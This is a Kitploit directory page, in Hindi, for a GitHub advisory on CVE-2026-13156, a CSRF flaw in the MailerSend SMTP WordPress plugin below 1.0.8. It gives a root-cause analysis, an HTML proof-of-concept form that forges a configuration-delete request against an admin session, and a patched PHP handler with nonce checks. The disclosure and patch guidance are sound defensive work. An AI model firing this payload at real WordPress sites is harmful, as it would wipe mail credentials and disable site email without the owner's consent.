Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-13156 — CVE-2026-13156 भेद्यता सलाह एवं PoC — Huynh Kien Minh (MinhHK) द्वारा खोजा गया। | Kitploit
उपकरण/GitHubGitHub/minhhk68/cve-2026-13156
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 भेद्यता सलाह एवं PoC — Huynh Kien Minh (MinhHK) द्वारा खोजा गया।

रिपॉजिटरी देखें
61 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-13156 — MailerSend आधिकारिक SMTP एकीकरण < 1.0.8 सेटिंग्स विलोपन और CSRF के माध्यम से प्लगइन निष्क्रियकरण

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory CVE-2026-13156 CSRF Attack Chain Infographic


📌 सारांश और त्वरित लिंक

[!IMPORTANT] सारांश: WordPress के लिए आधिकारिक MailerSend SMTP एकीकरण प्लगइन (< 1.0.8) में एक उच्च-गंभीरता वाली क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता (CVE-2026-13156) खोजी गई थी। कॉन्फ़िगरेशन विलोपन हैंडलर mailersend_handle_configuration_delete() प्रशासनिक क्षमताओं (manage_options) की पुष्टि करता है लेकिन WordPress नॉन्स सत्यापन (check_admin_referer()) को पूरी तरह से छोड़ देता है। एक हमलावर एक दुर्भावनापूर्ण क्रॉस-ओरिजिन अनुरोध तैयार कर सकता है जो एक प्रमाणित WordPress व्यवस्थापक को लक्षित करता है ताकि संग्रहीत SMTP क्रेडेंशियल्स को चुपचाप मिटाया जा सके और प्लगइन निष्क्रियकरण को बल दिया जा सके, जिसके परिणामस्वरूप सभी ईमेल वर्कफ़्लो में पूर्ण अनुप्रयोग सेवा अस्वीकृति होती है।

👉 Medium पर पूर्ण गहन तकनीकी लेख पढ़ें: गहन तकनीकी लेख: CVE-2026-13156 या मेरा सुरक्षा पोर्टफोलियो देखें: https://minhhk.web.app/


📋 कार्यकारी सारांश और भेद्यता अवलोकन

  • भेद्यता आईडी: CVE-2026-13156 (WPScan सलाहकार आईडी: 595e653d-0904-43cf-8e61-d684599de11b)
  • प्रभावित सॉफ़्टवेयर: MailerSend – आधिकारिक SMTP एकीकरण (WordPress प्लगइन)
  • प्रभावित संस्करण: संस्करण 1.0.8 से पहले (< 1.0.8)
  • भेद्यता प्रकार: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF जो सेटिंग्स विलोपन और प्लगइन निष्क्रियकरण की ओर ले जाती है) — CWE-352
  • प्रमुख शोधकर्ता और प्रकटकर्ता: Huynh Kien Minh (उपनाम: MinhHK)
  • भूमिका और संबद्धता: सूचना सुरक्षा छात्र, बग बाउंटी शिकारी, और आक्रामक सुरक्षा शोधकर्ता।

शोधकर्ता के बारे में:
Huynh Kien Minh (Huỳnh Kiến Minh) एक सक्रिय साइबर सुरक्षा शोधकर्ता और भेद्यता विश्लेषक हैं जो गहन सुरक्षा मूल्यांकन और जिम्मेदार प्रकटीकरण के लिए जाने जाते हैं, जिसमें CVE-2026-13156 के तकनीकी विवरण शामिल हैं। उन्हें महत्वपूर्ण सुरक्षा भेद्यताओं को खोजने और प्रकट करने के लिए Proton सुरक्षा हॉल ऑफ फ़ेम पर आधिकारिक रूप से मान्यता और सम्मानित भी किया गया है।


🌐 आधिकारिक सत्यापन केंद्र और संदर्भ

इस तकनीकी सलाह को सत्यापित करने, प्रूफ-ऑफ-कॉन्सेप्ट विश्लेषणों का पता लगाने, या शोधकर्ता से जुड़ने के लिए, देखें:

  • 🏠 आधिकारिक पोर्टफोलियो केंद्र: Huynh Kien Minh सुरक्षा पोर्टफोलियो केंद्र
  • 💼 LinkedIn प्रोफ़ाइल: LinkedIn पर Huynh Kien Minh से जुड़ें
  • 📝 आधिकारिक Medium श्वेतपत्र: गहन तकनीकी लेख: Medium पर CVE-2026-13156
  • 👨‍💻 GitHub प्रोफ़ाइल: MinhHK68 GitHub प्रोफ़ाइल
  • 🔗 WPScan सलाह: CVE-2026-13156 के लिए WPScan प्रविष्टि
  • 🔗 BaseFortify रिपोर्ट: BaseFortify CVE-2026-13156 विश्लेषण

🔍 गहन तकनीकी विवरण और मूल कारण विश्लेषण

1. मूल कारण विश्लेषण (लापता नॉन्स सत्यापन)

WordPress के लिए MailerSend आधिकारिक SMTP एकीकरण प्लगइन (संस्करण 1.0.8 से पहले) एक प्रशासनिक क्रिया (configuration-delete) पंजीकृत करता है जिसका उद्देश्य संग्रहीत API टोकन मिटाना, SMTP कॉन्फ़िगरेशन विकल्पों (wp_options) को साफ़ करना, और व्यवस्थापक डैशबोर्ड से ट्रिगर होने पर प्लगइन को निष्क्रिय करना है।

जबकि एंडपॉइंट यह सत्यापित करता है कि सक्रिय उपयोगकर्ता के पास manage_options क्षमता है (यह सुनिश्चित करते हुए कि अनुरोध एक व्यवस्थापक सत्र से उत्पन्न होता है), यह WordPress नॉन्स (check_admin_referer() या wp_verify_nonce()) सत्यापन करने में विफल रहता है।

क्योंकि नॉन्स सत्यापन की कमी वाले HTTP अनुरोध जानबूझकर किए गए व्यवस्थापक क्लिक और जाली क्रॉस-ओरिजिन अनुरोधों के बीच अंतर नहीं कर सकते हैं, एक प्रमाणित व्यवस्थापक द्वारा लोड की गई कोई भी बाहरी साइट चुपचाप configuration-delete क्रिया को ट्रिगर कर सकती है।

2. हमले का जीवनचक्र और प्रभाव

  1. लक्ष्य पहचान: एक हमलावर MailerSend SMTP (< 1.0.8) का उपयोग करने वाली एक लक्षित WordPress साइट की पहचान करता है।
  2. पेलोड वितरण: हमलावर एक दुर्भावनापूर्ण HTML/JavaScript वेबपेज तैयार करता है जिसमें प्रशासनिक एंडपॉइंट (/wp-admin/admin-post.php या /wp-admin/admin.php?page=mailersend&action=configuration-delete) को लक्षित करने वाला एक स्वचालित-सबमिटिंग फॉर्म होता है।
  3. ट्रिगर: एक लॉग-इन WordPress व्यवस्थापक हमलावर के वेबपेज पर जाता है (जैसे, फ़िशिंग, फ़ोरम लिंक, या बाहरी साइट पर XSS के माध्यम से)।
  4. निष्पादन और सेवा अस्वीकृति: ब्राउज़र व्यवस्थापक के सक्रिय सत्र कुकीज़ के साथ जाली अनुरोध भेजता है। MailerSend प्लगइन विलोपन हैंडलर निष्पादित करता है:
    • सभी संग्रहीत MailerSend SMTP सेटिंग्स और API क्रेडेंशियल्स डेटाबेस से मिटा दिए जाते हैं।
    • MailerSend प्लगइन स्वचालित रूप से निष्क्रिय हो जाता है।
    • महत्वपूर्ण प्रभाव: लक्षित वेबसाइट तुरंत सभी ईमेल भेजने की क्षमताएं खो देती है (पासवर्ड रीसेट, ऑर्डर सूचनाएं, सुरक्षा अलर्ट बिना चेतावनी के विफल हो जाते हैं)।

💻 प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण कोड

[!WARNING] नैतिक अस्वीकरण: निम्नलिखित HTML क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) प्रूफ-ऑफ-कॉन्सेप्ट पेलोड केवल शैक्षिक उद्देश्यों, रक्षात्मक सत्यापन, और Huynh Kien Minh द्वारा नैतिक प्रकटीकरण प्रोटोकॉल के तहत सुरक्षा ऑडिटिंग के लिए प्रदान किया गया है। अनधिकृत लक्ष्यों के विरुद्ध निष्पादित न करें।

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ उपचार और पैच विश्लेषण

सिस्टम व्यवस्थापकों और साइट स्वामियों के लिए

  • तत्काल अपग्रेड: MailerSend – आधिकारिक SMTP एकीकरण प्लगइन को तुरंत संस्करण 1.0.8 या उच्चतर में अपडेट करें।
  • सत्र स्वच्छता: बाहरी अविश्वसनीय वेब पेजों को ब्राउज़ करते समय हमेशा WordPress प्रशासनिक खातों से लॉग आउट करें, या साइट प्रशासन के लिए अलग पृथक ब्राउज़र प्रोफ़ाइल (या कंटेनर) का उपयोग करें।

डेवलपर्स के लिए (पैच कैसे काम करता है)

WordPress प्लगइन्स में प्रशासनिक राज्य-परिवर्तन क्रियाओं को ठीक से सुरक्षित करने के लिए, डेवलपर्स को अनुरोधों को संसाधित करने से पहले सख्त नॉन्स सत्यापन लागू करना चाहिए:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 संबंधित सुरक्षा मान्यता

  • 🏆 Proton हॉल ऑफ फ़ेम मान्यता: Proton के बुनियादी ढांचे में महत्वपूर्ण दोषों को खोजने और रिपोर्ट करने के लिए सम्मानित।
  • 🏠 आधिकारिक पोर्टफोलियो केंद्र: Huynh Kien Minh द्वारा अधिक आक्रामक सुरक्षा अनुसंधान, ओपन-सोर्स सुरक्षा उपकरण, और प्रकाशन देखें।

⚖️ लाइसेंस और कॉपीराइट

यह रिपॉजिटरी और तकनीकी सलाह Huynh Kien Minh (MinhHK) द्वारा एक सुरक्षित वैश्विक WordPress और साइबर सुरक्षा पारिस्थितिकी तंत्र को बढ़ावा देने के लिए जिम्मेदार प्रकटीकरण दिशानिर्देशों के तहत बनाए रखी और प्रकाशित की जाती है।

टूल डाउनलोड करें